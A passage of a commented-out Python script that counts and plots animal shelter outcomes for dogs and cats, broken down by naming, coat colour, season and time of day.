#percentageUnNamedCatsOutcomes = [percentageUnNamedCatsAdopted, percentageUnNamedCatsDied, percentageUnNamedCatsTransfered, percentageUnNamedCatsReturnToOwners, percentageUnNamedCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageNamedDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Named Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageUnNamedDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Un-Named Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageNamedCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Named Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageUnNamedCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Un-Named Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#SolidColorDogsAdopted = 0
#SolidColorDogsDied = 0
#SolidColorDogsTransfered = 0
#SolidColorDogsReturnedToOwners = 0
#SolidColorDogsEuthanized = 0
#MixedColorDogsAdopted = 0
#MixedColorDogsDied = 0
#MixedColorDogsTransfered = 0
#MixedColorDogsReturnedToOwners = 0
#MixedColorDogsEuthanized = 0
#SolidColorCatsAdopted = 0
#SolidColorCatsDied = 0
#SolidColorCatsTransfered = 0
#SolidColorCatsReturnedToOwners = 0
#SolidColorCatsEuthanized = 0
#MixedColorCatsAdopted = 0
#MixedColorCatsDied = 0
#MixedColorCatsTransfered = 0
#MixedColorCatsReturnedToOwners = 0
#MixedColorCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][9] == 'SolidColor':
# SolidColorDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][9] == 'SolidColor':
# SolidColorDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][9] == 'SolidColor':
# SolidColorDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][9] == 'SolidColor':
# SolidColorDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][9] == 'SolidColor':
# SolidColorDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][9] == 'MixedColor':
# MixedColorDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][9] == 'MixedColor':
# MixedColorDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][9] == 'MixedColor':
# MixedColorDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][9] == 'MixedColor':
# MixedColorDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][9] == 'MixedColor':
# MixedColorDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][9] == 'SolidColor':
# SolidColorCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][9] == 'SolidColor':
# SolidColorCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][9] == 'SolidColor':
# SolidColorCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][9] == 'SolidColor':
# SolidColorCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][9] == 'SolidColor':
# SolidColorCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][9] == 'MixedColor':
# MixedColorCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][9] == 'MixedColor':
# MixedColorCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][9] == 'MixedColor':
# MixedColorCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][9] == 'MixedColor':
# MixedColorCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][9] == 'MixedColor':
# MixedColorCatsEuthanized += 1
#numSolidColorDogs = 0
#numMixedColorDogs = 0
#numSolidColorCats = 0
#numMixedColorCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][9] == 'SolidColor':
# numSolidColorDogs += 1
# if data[i][5] == 'Dog' and data[i][9] == 'MixedColor':
# numMixedColorDogs += 1
# if data[i][5] == 'Cat' and data[i][9] == 'SolidColor':
# numSolidColorCats += 1
# if data[i][5] == 'Cat' and data[i][9] == 'MixedColor':
# numMixedColorCats += 1
#percentageSolidColorDogsAdopted = SolidColorDogsAdopted/numSolidColorDogs*100
#percentageSolidColorDogsDied = SolidColorDogsDied/numSolidColorDogs*100
#percentageSolidColorDogsTransfered = SolidColorDogsTransfered/numSolidColorDogs*100
#percentageSolidColorDogsReturnToOwners = SolidColorDogsReturnedToOwners/numSolidColorDogs*100
#percentageSolidColorDogsEuthanized = SolidColorDogsEuthanized/numSolidColorDogs*100
#percentageSolidColorDogsOutcomes = [percentageSolidColorDogsAdopted, percentageSolidColorDogsDied, percentageSolidColorDogsTransfered, percentageSolidColorDogsReturnToOwners, percentageSolidColorDogsEuthanized]
#percentageMixedColorDogsAdopted = MixedColorDogsAdopted/numMixedColorDogs*100
#percentageMixedColorDogsDied = MixedColorDogsDied/numMixedColorDogs*100
#percentageMixedColorDogsTransfered = MixedColorDogsTransfered/numMixedColorDogs*100
#percentageMixedColorDogsReturnToOwners = MixedColorDogsReturnedToOwners/numMixedColorDogs*100
#percentageMixedColorDogsEuthanized = MixedColorDogsEuthanized/numMixedColorDogs*100
#percentageMixedColorDogsOutcomes = [percentageMixedColorDogsAdopted, percentageMixedColorDogsDied, percentageMixedColorDogsTransfered, percentageMixedColorDogsReturnToOwners, percentageMixedColorDogsEuthanized]
#percentageSolidColorCatsAdopted = SolidColorCatsAdopted/numSolidColorCats*100
#percentageSolidColorCatsDied = SolidColorCatsDied/numSolidColorCats*100
#percentageSolidColorCatsTransfered = SolidColorCatsTransfered/numSolidColorCats*100
#percentageSolidColorCatsReturnToOwners = SolidColorCatsReturnedToOwners/numSolidColorCats*100
#percentageSolidColorCatsEuthanized = SolidColorCatsEuthanized/numSolidColorCats*100
#percentageSolidColorCatsOutcomes = [percentageSolidColorCatsAdopted, percentageSolidColorCatsDied, percentageSolidColorCatsTransfered, percentageSolidColorCatsReturnToOwners, percentageSolidColorCatsEuthanized]
#percentageMixedColorCatsAdopted = MixedColorCatsAdopted/numMixedColorCats*100
#percentageMixedColorCatsDied = MixedColorCatsDied/numMixedColorCats*100
#percentageMixedColorCatsTransfered = MixedColorCatsTransfered/numMixedColorCats*100
#percentageMixedColorCatsReturnToOwners = MixedColorCatsReturnedToOwners/numMixedColorCats*100
#percentageMixedColorCatsEuthanized = MixedColorCatsEuthanized/numMixedColorCats*100
#percentageMixedColorCatsOutcomes = [percentageMixedColorCatsAdopted, percentageMixedColorCatsDied, percentageMixedColorCatsTransfered, percentageMixedColorCatsReturnToOwners, percentageMixedColorCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSolidColorDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Solid Color Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMixedColorDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Mixed Color Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSolidColorCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Solid Color Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageMixedColorCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Mixed Color Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#SpringDogsAdopted = 0
#SpringDogsDied = 0
#SpringDogsTransfered = 0
#SpringDogsReturnedToOwners = 0
#SpringDogsEuthanized = 0
#SummerDogsAdopted = 0
#SummerDogsDied = 0
#SummerDogsTransfered = 0
#SummerDogsReturnedToOwners = 0
#SummerDogsEuthanized = 0
#FallDogsAdopted = 0
#FallDogsDied = 0
#FallDogsTransfered = 0
#FallDogsReturnedToOwners = 0
#FallDogsEuthanized = 0
#WinterDogsAdopted = 0
#WinterDogsDied = 0
#WinterDogsTransfered = 0
#WinterDogsReturnedToOwners = 0
#WinterDogsEuthanized = 0
#SpringCatsAdopted = 0
#SpringCatsDied = 0
#SpringCatsTransfered = 0
#SpringCatsReturnedToOwners = 0
#SpringCatsEuthanized = 0
#SummerCatsAdopted = 0
#SummerCatsDied = 0
#SummerCatsTransfered = 0
#SummerCatsReturnedToOwners = 0
#SummerCatsEuthanized = 0
#FallCatsAdopted = 0
#FallCatsDied = 0
#FallCatsTransfered = 0
#FallCatsReturnedToOwners = 0
#FallCatsEuthanized = 0
#WinterCatsAdopted = 0
#WinterCatsDied = 0
#WinterCatsTransfered = 0
#WinterCatsReturnedToOwners = 0
#WinterCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][1] == 'Spring':
# SpringDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][1] == 'Spring':
# SpringDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][1] == 'Spring':
# SpringDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Spring':
# SpringDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][1] == 'Spring':
# SpringDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][1] == 'Summer':
# SummerDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][1] == 'Summer':
# SummerDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][1] == 'Summer':
# SummerDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Summer':
# SummerDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][1] == 'Summer':
# SummerDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][1] == 'Fall':
# FallDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][1] == 'Fall':
# FallDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][1] == 'Fall':
# FallDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Fall':
# FallDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][1] == 'Fall':
# FallDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][1] == 'Winter':
# WinterDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][1] == 'Winter':
# WinterDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][1] == 'Winter':
# WinterDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Winter':
# WinterDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][1] == 'Winter':
# WinterDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][1] == 'Spring':
# SpringCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][1] == 'Spring':
# SpringCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][1] == 'Spring':
# SpringCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Spring':
# SpringCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][1] == 'Spring':
# SpringCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][1] == 'Summer':
# SummerCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][1] == 'Summer':
# SummerCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][1] == 'Summer':
# SummerCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Summer':
# SummerCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][1] == 'Summer':
# SummerCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][1] == 'Fall':
# FallCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][1] == 'Fall':
# FallCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][1] == 'Fall':
# FallCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Fall':
# FallCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][1] == 'Fall':
# FallCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][1] == 'Winter':
# WinterCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][1] == 'Winter':
# WinterCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][1] == 'Winter':
# WinterCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][1] == 'Winter':
# WinterCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][1] == 'Winter':
# WinterCatsEuthanized += 1
#numSpringDogs = 0
#numSummerDogs = 0
#numFallDogs = 0
#numWinterDogs = 0
#numSpringCats = 0
#numSummerCats = 0
#numFallCats = 0
#numWinterCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][1] == 'Spring':
# numSpringDogs += 1
# if data[i][5] == 'Dog' and data[i][1] == 'Summer':
# numSummerDogs += 1
# if data[i][5] == 'Dog' and data[i][1] == 'Fall':
# numFallDogs += 1
# if data[i][5] == 'Dog' and data[i][1] == 'Winter':
# numWinterDogs += 1
# if data[i][5] == 'Cat' and data[i][1] == 'Spring':
# numSpringCats += 1
# if data[i][5] == 'Cat' and data[i][1] == 'Summer':
# numSummerCats += 1
# if data[i][5] == 'Cat' and data[i][1] == 'Fall':
# numFallCats += 1
# if data[i][5] == 'Cat' and data[i][1] == 'Winter':
# numWinterCats += 1
#percentageSpringDogsAdopted = SpringDogsAdopted/numSpringDogs*100
#percentageSpringDogsDied = SpringDogsDied/numSpringDogs*100
#percentageSpringDogsTransfered = SpringDogsTransfered/numSpringDogs*100
#percentageSpringDogsReturnToOwners = SpringDogsReturnedToOwners/numSpringDogs*100
#percentageSpringDogsEuthanized = SpringDogsEuthanized/numSpringDogs*100
#percentageSpringDogsOutcomes = [percentageSpringDogsAdopted, percentageSpringDogsDied, percentageSpringDogsTransfered, percentageSpringDogsReturnToOwners, percentageSpringDogsEuthanized]
#percentageSummerDogsAdopted = SummerDogsAdopted/numSummerDogs*100
#percentageSummerDogsDied = SummerDogsDied/numSummerDogs*100
#percentageSummerDogsTransfered = SummerDogsTransfered/numSummerDogs*100
#percentageSummerDogsReturnToOwners = SummerDogsReturnedToOwners/numSummerDogs*100
#percentageSummerDogsEuthanized = SummerDogsEuthanized/numSummerDogs*100
#percentageSummerDogsOutcomes = [percentageSummerDogsAdopted, percentageSummerDogsDied, percentageSummerDogsTransfered, percentageSummerDogsReturnToOwners, percentageSummerDogsEuthanized]
#percentageFallDogsAdopted = FallDogsAdopted/numFallDogs*100
#percentageFallDogsDied = FallDogsDied/numFallDogs*100
#percentageFallDogsTransfered = FallDogsTransfered/numFallDogs*100
#percentageFallDogsReturnToOwners = FallDogsReturnedToOwners/numFallDogs*100
#percentageFallDogsEuthanized = FallDogsEuthanized/numFallDogs*100
#percentageFallDogsOutcomes = [percentageFallDogsAdopted, percentageFallDogsDied, percentageFallDogsTransfered, percentageFallDogsReturnToOwners, percentageFallDogsEuthanized]
#percentageWinterDogsAdopted = WinterDogsAdopted/numWinterDogs*100
#percentageWinterDogsDied = WinterDogsDied/numWinterDogs*100
#percentageWinterDogsTransfered = WinterDogsTransfered/numWinterDogs*100
#percentageWinterDogsReturnToOwners = WinterDogsReturnedToOwners/numWinterDogs*100
#percentageWinterDogsEuthanized = WinterDogsEuthanized/numWinterDogs*100
#percentageWinterDogsOutcomes = [percentageWinterDogsAdopted, percentageWinterDogsDied, percentageWinterDogsTransfered, percentageWinterDogsReturnToOwners, percentageWinterDogsEuthanized]
#percentageSpringCatsAdopted = SpringCatsAdopted/numSpringCats*100
#percentageSpringCatsDied = SpringCatsDied/numSpringCats*100
#percentageSpringCatsTransfered = SpringCatsTransfered/numSpringCats*100
#percentageSpringCatsReturnToOwners = SpringCatsReturnedToOwners/numSpringCats*100
#percentageSpringCatsEuthanized = SpringCatsEuthanized/numSpringCats*100
#percentageSpringCatsOutcomes = [percentageSpringCatsAdopted, percentageSpringCatsDied, percentageSpringCatsTransfered, percentageSpringCatsReturnToOwners, percentageSpringCatsEuthanized]
#percentageSummerCatsAdopted = SummerCatsAdopted/numSummerCats*100
#percentageSummerCatsDied = SummerCatsDied/numSummerCats*100
#percentageSummerCatsTransfered = SummerCatsTransfered/numSummerCats*100
#percentageSummerCatsReturnToOwners = SummerCatsReturnedToOwners/numSummerCats*100
#percentageSummerCatsEuthanized = SummerCatsEuthanized/numSummerCats*100
#percentageSummerCatsOutcomes = [percentageSummerCatsAdopted, percentageSummerCatsDied, percentageSummerCatsTransfered, percentageSummerCatsReturnToOwners, percentageSummerCatsEuthanized]
#percentageFallCatsAdopted = FallCatsAdopted/numFallCats*100
#percentageFallCatsDied = FallCatsDied/numFallCats*100
#percentageFallCatsTransfered = FallCatsTransfered/numFallCats*100
#percentageFallCatsReturnToOwners = FallCatsReturnedToOwners/numFallCats*100
#percentageFallCatsEuthanized = FallCatsEuthanized/numFallCats*100
#percentageFallCatsOutcomes = [percentageFallCatsAdopted, percentageFallCatsDied, percentageFallCatsTransfered, percentageFallCatsReturnToOwners, percentageFallCatsEuthanized]
#percentageWinterCatsAdopted = WinterCatsAdopted/numWinterCats*100
#percentageWinterCatsDied = WinterCatsDied/numWinterCats*100
#percentageWinterCatsTransfered = WinterCatsTransfered/numWinterCats*100
#percentageWinterCatsReturnToOwners = WinterCatsReturnedToOwners/numWinterCats*100
#percentageWinterCatsEuthanized = WinterCatsEuthanized/numWinterCats*100
#percentageWinterCatsOutcomes = [percentageWinterCatsAdopted, percentageWinterCatsDied, percentageWinterCatsTransfered, percentageWinterCatsReturnToOwners, percentageWinterCatsEuthanized]
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSpringDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Spring Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSummerDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Summer Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageFallDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Fall Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageWinterDogsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Winter Dog Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSpringCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Spring Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageSummerCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Summer Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageFallCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Fall Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageWinterCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Winter Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#MorningDogsAdopted = 0
#MorningDogsDied = 0
#MorningDogsTransfered = 0
#MorningDogsReturnedToOwners = 0
#MorningDogsEuthanized = 0
#AfternoonDogsAdopted = 0
#AfternoonDogsDied = 0
#AfternoonDogsTransfered = 0
#AfternoonDogsReturnedToOwners = 0
#AfternoonDogsEuthanized = 0
#NightDogsAdopted = 0
#NightDogsDied = 0
#NightDogsTransfered = 0
#NightDogsReturnedToOwners = 0
#NightDogsEuthanized = 0
#MorningCatsAdopted = 0
#MorningCatsDied = 0
#MorningCatsTransfered = 0
#MorningCatsReturnedToOwners = 0
#MorningCatsEuthanized = 0
#AfternoonCatsAdopted = 0
#AfternoonCatsDied = 0
#AfternoonCatsTransfered = 0
#AfternoonCatsReturnedToOwners = 0
#AfternoonCatsEuthanized = 0
#NightCatsAdopted = 0
#NightCatsDied = 0
#NightCatsTransfered = 0
#NightCatsReturnedToOwners = 0
#NightCatsEuthanized = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][2] == 'Morning':
# MorningDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][2] == 'Morning':
# MorningDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][2] == 'Morning':
# MorningDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Morning':
# MorningDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][2] == 'Morning':
# MorningDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][2] == 'Afternoon':
# AfternoonDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][2] == 'Afternoon':
# AfternoonDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][2] == 'Afternoon':
# AfternoonDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Afternoon':
# AfternoonDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][2] == 'Afternoon':
# AfternoonDogsEuthanized += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Adoption' and data[i][2] == 'Night':
# NightDogsAdopted += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Died' and data[i][2] == 'Night':
# NightDogsDied += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Transfer' and data[i][2] == 'Night':
# NightDogsTransfered += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Night':
# NightDogsReturnedToOwners += 1
# if data[i][5] == 'Dog' and data[i][3] == 'Euthanasia' and data[i][2] == 'Night':
# NightDogsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][2] == 'Morning':
# MorningCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][2] == 'Morning':
# MorningCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][2] == 'Morning':
# MorningCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Morning':
# MorningCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][2] == 'Morning':
# MorningCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][2] == 'Afternoon':
# AfternoonCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][2] == 'Afternoon':
# AfternoonCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][2] == 'Afternoon':
# AfternoonCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Afternoon':
# AfternoonCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][2] == 'Afternoon':
# AfternoonCatsEuthanized += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Adoption' and data[i][2] == 'Night':
# NightCatsAdopted += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Died' and data[i][2] == 'Night':
# NightCatsDied += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Transfer' and data[i][2] == 'Night':
# NightCatsTransfered += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Return_to_owner' and data[i][2] == 'Night':
# NightCatsReturnedToOwners += 1
# if data[i][5] == 'Cat' and data[i][3] == 'Euthanasia' and data[i][2] == 'Night':
# NightCatsEuthanized += 1
#numMorningDogs = 0
#numAfternoonDogs = 0
#numNightDogs = 0
#numMorningCats = 0
#numAfternoonCats = 0
#numNightCats = 0
#for i in range(len(dataVectors)):
# if data[i][5] == 'Dog' and data[i][2] == 'Morning':
# numMorningDogs += 1
# if data[i][5] == 'Dog' and data[i][2] == 'Afternoon':
# numAfternoonDogs += 1
# if data[i][5] == 'Dog' and data[i][2] == 'Night':
# numNightDogs += 1
# if data[i][5] == 'Cat' and data[i][2] == 'Morning':
# numMorningCats += 1
# if data[i][5] == 'Cat' and data[i][2] == 'Afternoon':
# numAfternoonCats += 1
# if data[i][5] == 'Cat' and data[i][2] == 'Night':
# numNightCats += 1
#percentageMorningDogsAdopted = MorningDogsAdopted/numMorningDogs*100
#percentageMorningDogsDied = MorningDogsDied/numMorningDogs*100
#percentageMorningDogsTransfered = MorningDogsTransfered/numMorningDogs*100
#percentageMorningDogsReturnToOwners = MorningDogsReturnedToOwners/numMorningDogs*100
#percentageMorningDogsEuthanized = MorningDogsEuthanized/numMorningDogs*100
#percentageMorningDogsOutcomes = [percentageMorningDogsAdopted, percentageMorningDogsDied, percentageMorningDogsTransfered, percentageMorningDogsReturnToOwners, percentageMorningDogsEuthanized]
#percentageAfternoonDogsAdopted = AfternoonDogsAdopted/numAfternoonDogs*100
#percentageAfternoonDogsDied = AfternoonDogsDied/numAfternoonDogs*100
#percentageAfternoonDogsTransfered = AfternoonDogsTransfered/numAfternoonDogs*100
#percentageAfternoonDogsReturnToOwners = AfternoonDogsReturnedToOwners/numAfternoonDogs*100
#percentageAfternoonDogsEuthanized = AfternoonDogsEuthanized/numAfternoonDogs*100
